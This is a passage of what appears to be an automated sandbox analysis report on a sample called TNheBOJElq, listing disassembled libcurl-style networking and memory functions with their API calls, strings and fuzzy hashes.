                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?), ref: 00E3B33A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,?), ref: 00E3B372
                                      • Part of subcall function 00E12813: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E12848
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$_strrchrmalloc
                                    • String ID: %s%s%s$LIST$NLST
                                    • API String ID: 685622329-959297966
                                    • Opcode ID: 17dba909ec9f65da0cf0a051057edcb26fd4d42ffd1ffb2ac4a4bee9e30d4fbb
                                    • Instruction ID: ba1d3be1e87df51ba1c7ded9ea4af73d1ecef930082dd5789a8d21d8206c7999
                                    • Opcode Fuzzy Hash: 17dba909ec9f65da0cf0a051057edcb26fd4d42ffd1ffb2ac4a4bee9e30d4fbb
                                    • Instruction Fuzzy Hash: 8A312B72700615AFDB089B69AC457BEB7E8EF44355F10507EEA02F7251D7B09D04C790
                                    Function 00E28B9F Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96COMMON
                                    Download Yara Rule
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00E2EBB8,?), ref: 00E28BBF
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00E2EBB8,?,?), ref: 00E28C96
                                      • Part of subcall function 00E288E1: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E28C01,?,?,00000000), ref: 00E28928
                                      • Part of subcall function 00E288E1: InitializeCriticalSectionEx.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000001,00E28C01,?,?,00000000), ref: 00E28936
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00E2EBB8,?,?,?,?), ref: 00E28C19
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00E2EBB8,?,?,?,?), ref: 00E28C2E
                                    • _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00E28A20,00000010,00000000,00000000,?,?,?,?,?,?,?,?,?,00E2EBB8), ref: 00E28C63
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$CriticalInitializeSection_beginthreadex_errnocallocmalloc
                                    • String ID: 0kv@qv@/lv
                                    • API String ID: 1055258384-1424214619
                                    • Opcode ID: 64c819562e5677a76094b359d2ebb467feb652685b75b0c25710b539acda3714
                                    • Instruction ID: fd43e50e3ecd3ecc63a649b436975afc9cad1fe4a17de62e1c974863f3f6371f
                                    • Opcode Fuzzy Hash: 64c819562e5677a76094b359d2ebb467feb652685b75b0c25710b539acda3714
                                    • Instruction Fuzzy Hash: 5D31C172A01715DFDB189F65F94559EBBF4EF48311B10446EE806E32A1DFB0A904CB91
                                    Function 00E0D05C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 92COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _strrchr$free
                                    • String ID: %s%s$%s/%s$://
                                    • API String ID: 3904173637-3147304931
                                    • Opcode ID: e75cd5b1fb8d2562ff4ef731d8f627703c4e7a414ed7d2582977adcb6bc9908f
                                    • Instruction ID: f648cb8a877513fb5d2b8d31d23366d77a79f037f114117bd07a89effacf9561
                                    • Opcode Fuzzy Hash: e75cd5b1fb8d2562ff4ef731d8f627703c4e7a414ed7d2582977adcb6bc9908f
                                    • Instruction Fuzzy Hash: A3212832F09310ABEB2466F55C41B6EB6E5CB84750F142479ED05B72C1EE31CD868384
                                    Function 00E1E574 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 73networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • getsockname.WS2_32(?,?,?), ref: 00E1E5C6
                                    • WSAGetLastError.WS2_32(?,?,?), ref: 00E1E5D0
                                      • Part of subcall function 00E1A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A0C3
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0CB
                                      • Part of subcall function 00E1A0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0DD
                                      • Part of subcall function 00E1A0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 00E1A0EC
                                      • Part of subcall function 00E1A0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 00E1A0F6
                                      • Part of subcall function 00E1A0B8: _strrchr.LIBCMT ref: 00E1A142
                                      • Part of subcall function 00E1A0B8: _strrchr.LIBCMT ref: 00E1A15C
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A173
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A180
                                      • Part of subcall function 00E1A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A188
                                      • Part of subcall function 00E1A0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00E1A193
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 00E1E60E
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 00E1E616
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _errno$ErrorLast$_strrchr$__sys_errlist__sys_nerrgetsocknamestrncpy
                                    • String ID: 0kv@qv@/lv$getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                    • API String ID: 2515041809-2797063059
                                    • Opcode ID: 04c1cbd4885cab40c04d76b83fda8daeaf1374a3e5ee4e4afa0b6f1fd46f7f24
                                    • Instruction ID: b178ddeccd60576f86edae022d872356f14a1cef6d2e4137bbeaf0240910935e
                                    • Opcode Fuzzy Hash: 04c1cbd4885cab40c04d76b83fda8daeaf1374a3e5ee4e4afa0b6f1fd46f7f24
                                    • Instruction Fuzzy Hash: A6218772900218AFCB149B65DC55AEE77F8EB09310F404595F909F3290EE706E888FA1
                                    Function 00E29EC0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 73COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E29EDF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E29F59
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchrfree
                                    • String ID: %s%s%s:%d$Host$Host: %s$TQ$XQ
                                    • API String ID: 653773606-1047823213
                                    • Opcode ID: ceeb59f330e7256a1642dad61cb66df4fc8bd3b6c854db7fea8530de0beb1247
                                    • Instruction ID: 1e0f747c9a2b7f20ba66489b402c1ac9c6f9d10dcb2a28a6025ebb81a8375f46
                                    • Opcode Fuzzy Hash: ceeb59f330e7256a1642dad61cb66df4fc8bd3b6c854db7fea8530de0beb1247
                                    • Instruction Fuzzy Hash: 8F110872348715AFA7159E55BD82A7A37D9EF85BB0F11602DFD05FB282E6709C008660
                                    Function 00E1E49E Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 72networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • getpeername.WS2_32(?,?,?), ref: 00E1E4E6
                                    • WSAGetLastError.WS2_32 ref: 00E1E4F0
                                      • Part of subcall function 00E1A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A0C3
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0CB
                                      • Part of subcall function 00E1A0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0DD
                                      • Part of subcall function 00E1A0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 00E1A0EC
                                      • Part of subcall function 00E1A0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 00E1A0F6
                                      • Part of subcall function 00E1A0B8: _strrchr.LIBCMT ref: 00E1A142
                                      • Part of subcall function 00E1A0B8: _strrchr.LIBCMT ref: 00E1A15C
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A173
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A180
                                      • Part of subcall function 00E1A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A188
                                      • Part of subcall function 00E1A0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00E1A193
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1E535
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1E53D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _errno$ErrorLast$_strrchr$__sys_errlist__sys_nerrgetpeernamestrncpy
                                    • String ID: 0kv@qv@/lv$getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                                    • API String ID: 1744225859-3435328547
                                    • Opcode ID: d3cc0745dce5c275478366c3cbce62654b243590ff02660c1a03d9450944d6e5
                                    • Instruction ID: 61c89dedaf7132ffc3be88571180124462df04d6592b3f87dbc56fcee26e2970
                                    • Opcode Fuzzy Hash: d3cc0745dce5c275478366c3cbce62654b243590ff02660c1a03d9450944d6e5
                                    • Instruction Fuzzy Hash: FF2196B25002186FDB14AB64DC55EEE77FDEB09354F0045A6F909F3291EA705E888FE0
                                    Function 00E42CC6 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 201COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E467EE: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E30591,00000001,00000000,00000000,00000000,?,?,?), ref: 00E46847
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,00E30D79,?), ref: 00E42E88
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,00E30D79,?), ref: 00E42EAD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00E30D79,?), ref: 00E42ECD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E42F34
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$malloc
                                    • String ID: %sAuthorization: Negotiate %s$Curl_output_negotiate, no persistent authentication: cleanup existing context$Negotiate$Proxy-
                                    • API String ID: 2190258309-1255959952
                                    • Opcode ID: dda269857f68371ea59d068a6454e0d1a0c5feec639cc7ebb7ecb84d727345c5
                                    • Instruction ID: a8fae1980e26cc2e1579517956a1f1d221c9da37cdcb26541ca74dbb75bb4d21
                                    • Opcode Fuzzy Hash: dda269857f68371ea59d068a6454e0d1a0c5feec639cc7ebb7ecb84d727345c5
                                    • Instruction Fuzzy Hash: C6710130B44206DFDB198B14E850BA97BF4EF85388F9950ADE941BB292EB74DD48CB50
                                    Function 00E018C8 Relevance: 12.1, APIs: 8, Instructions: 113COMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,00E01773), ref: 00E018D7
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E0190C
                                    • _strrchr.LIBCMT ref: 00E0191C
                                    • _strrchr.LIBCMT ref: 00E01931
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,00E01773), ref: 00E01944
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E01955
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E01965
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,?,00E01773), ref: 00E019A0
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr$_strrchrfree$malloc
                                    • String ID:
                                    • API String ID: 3226260525-0
                                    • Opcode ID: 45f965ee278d7f9ff69e4efd0cdaf0e5f671abd682f7d244e7928c271e36933c
                                    • Instruction ID: 7ad1b7ec389c1c6289d5f7622f03b84b5a06f792cfa57a2aac6c6931345eedfa
                                    • Opcode Fuzzy Hash: 45f965ee278d7f9ff69e4efd0cdaf0e5f671abd682f7d244e7928c271e36933c
                                    • Instruction Fuzzy Hash: 9B318B371097026ED72A5768AC219BA7BDCCFC336575414DEE841BF1C2DF019D898270
                                    Function 00E32B7A Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E32BB8
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E32C0A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: Content-Range$Content-Range: bytes %s%I64d/%I64d$Content-Range: bytes %s/%I64d$Content-Range: bytes 0-%I64d/%I64d$Range$Range: bytes=%s
                                    • API String ID: 1294909896-2902172602
                                    • Opcode ID: 233386c05a1e4ef57b8ab75a67b712403e7f3d60548da3a858e1b550e3cc120d
                                    • Instruction ID: 5f4f46510223c23376554d9d31c2673a273ae76d3d30bbdc71f9510a6fb960d7
                                    • Opcode Fuzzy Hash: 233386c05a1e4ef57b8ab75a67b712403e7f3d60548da3a858e1b550e3cc120d
                                    • Instruction Fuzzy Hash: 50312672B04612AFE71C1F78AC49FFAFB91FB85754F14632EE648B2151DB216C90C6A0
                                    Function 00E350DE Relevance: 12.1, APIs: 8, Instructions: 97sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E3480B: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00E124A8), ref: 00E34820
                                      • Part of subcall function 00E3480B: __alldvrm.LIBCMT ref: 00E34839
                                      • Part of subcall function 00E3480B: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E34863
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,00000000), ref: 00E3510A
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000), ref: 00E35118
                                    • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(00000001), ref: 00E35159
                                    • MoveFileExA.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING),00000000,?,00000000), ref: 00E35166
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E35175
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E35181
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E351A1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E351AD
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$_strdup$CounterFileMovePerformanceQuerySleepUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1781201201-0
                                    • Opcode ID: 90f5ca063a8b2a7261c06d6b18e5b44bcb19d13d9ec18a1d3ec8de94bd500ecd
                                    • Instruction ID: 4f3e49a06e5a946a0d9a80db6b68378a26de6a8b97a05e544ebea6de61743deb
                                    • Opcode Fuzzy Hash: 90f5ca063a8b2a7261c06d6b18e5b44bcb19d13d9ec18a1d3ec8de94bd500ecd
                                    • Instruction Fuzzy Hash: 1A21F177901E05AF8B15EFA4AC49A9FBBF9EF09311F040829FC01FB241DBB199048A90
                                    Function 00E28A20 Relevance: 12.1, APIs: 8, Instructions: 80networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E3FEA6: getaddrinfo.WS2_32(?,?,?,?), ref: 00E3FEC0
                                      • Part of subcall function 00E3FEA6: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 00E3FF44
                                    • WSAGetLastError.WS2_32 ref: 00E28A68
                                    • WSAGetLastError.WS2_32 ref: 00E28A72
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 00E28A87
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 00E28A95
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E28AB1
                                    • send.WS2_32(000000FF,?,00000001,00000000), ref: 00E28ACC
                                    • WSAGetLastError.WS2_32 ref: 00E28AD6
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 00E28AE4
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: CriticalErrorLastSection$Leave$Enterfreegetaddrinfomallocsend
                                    • String ID:
                                    • API String ID: 2368937457-0
                                    • Opcode ID: 71f77af62661c15932a590917d76af5e81213fd96ab69da8a22c588aed45a7c1
                                    • Instruction ID: 3ec92fdf9fd7082f5727c5200d4611a21a42be01e86eb05e66dbd727153db6b1
                                    • Opcode Fuzzy Hash: 71f77af62661c15932a590917d76af5e81213fd96ab69da8a22c588aed45a7c1
                                    • Instruction Fuzzy Hash: 3D21B476500714DFC7249F65EC54A6BB7F9FF44311B00492EE992E32A1DE30A809CF50
                                    Function 00E51110 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                    Download Yara Rule
                                    APIs
                                    • _set_app_type.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001), ref: 00E51113
                                    • _set_fmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 00E5111E
                                    • __p__commode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 00E5112A
                                    • __RTC_Initialize.LIBCMT ref: 00E51142
                                    • _configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00E518B0), ref: 00E51157
                                      • Part of subcall function 00E51813: InitializeSListHead.KERNEL32(00E6F430,00E51167), ref: 00E51818
                                    • __setusermatherr.API-MS-WIN-CRT-MATH-L1-1-0(Function_00027BE0), ref: 00E51175
                                    • _configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000), ref: 00E51190
                                    • _initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E5119F
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: Initialize$HeadList__p__commode__setusermatherr_configthreadlocale_configure_narrow_argv_initialize_narrow_environment_set_app_type_set_fmode
                                    • String ID:
                                    • API String ID: 1933938900-0
                                    • Opcode ID: ac02fe35fee754376707dc6f2fc4265e6abb73744f33ec343e9e345b4a9d6a2c
                                    • Instruction ID: cf86a19d1d23abb804790bd66b658de8e8a0813c3dddad5b49b2ad30321fc689
                                    • Opcode Fuzzy Hash: ac02fe35fee754376707dc6f2fc4265e6abb73744f33ec343e9e345b4a9d6a2c
                                    • Instruction Fuzzy Hash: 3B014F2554971215ED2833F16A07B9E02D50F123DBF647DD8FE40BA183ED6AD44C41B7
                                    Function 00E5224A Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00E52241,00E520AB,00E51714), ref: 00E52258
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E52266
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E5227F
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00E52241,00E520AB,00E51714), ref: 00E522D1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: 0949e655a06cad1267ab6312b86b2f598749d8d99c231db8733655f23dc5beb5
                                    • Instruction ID: c69c605deb78cad10ef9817b9ac2feb6d71c82149fae9e8d9cb2d8cac40c715a
                                    • Opcode Fuzzy Hash: 0949e655a06cad1267ab6312b86b2f598749d8d99c231db8733655f23dc5beb5
                                    • Instruction Fuzzy Hash: 3601DE3A2097116EA66426B67C8562B2BD4AB077BAB202A3DFF10740F2EF914C0D5164
                                    Function 00E42110 Relevance: 11.4, APIs: 9, Instructions: 148COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E42223
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4223B
